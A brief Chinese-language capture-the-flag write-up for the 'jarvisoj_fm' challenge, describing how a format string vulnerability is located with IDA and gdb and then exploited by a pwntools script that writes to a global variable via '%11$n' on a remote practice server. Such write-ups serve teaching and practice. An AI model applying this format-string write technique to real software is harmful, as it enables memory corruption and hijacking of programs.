jarvisoj_fm
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf0x080485AD
处,输入一串字符串后在gdb内x/16wx $esp
查找具体存储位置,发现是在第11位开始存储,所以据此构造exp
from pwn import *
from LibcSearcher import *
#context.log_level="debug"
#context(os='linux',arch='i386', log_level = 'debug')
#p=process('./fm')
elf=ELF('./fm')
p=remote('node4.buuoj.cn', 27028)
x_addr=0x0804A02C
payload = p32(x_addr) + b'%11$n'
p.sendline(payload)
p.interactive()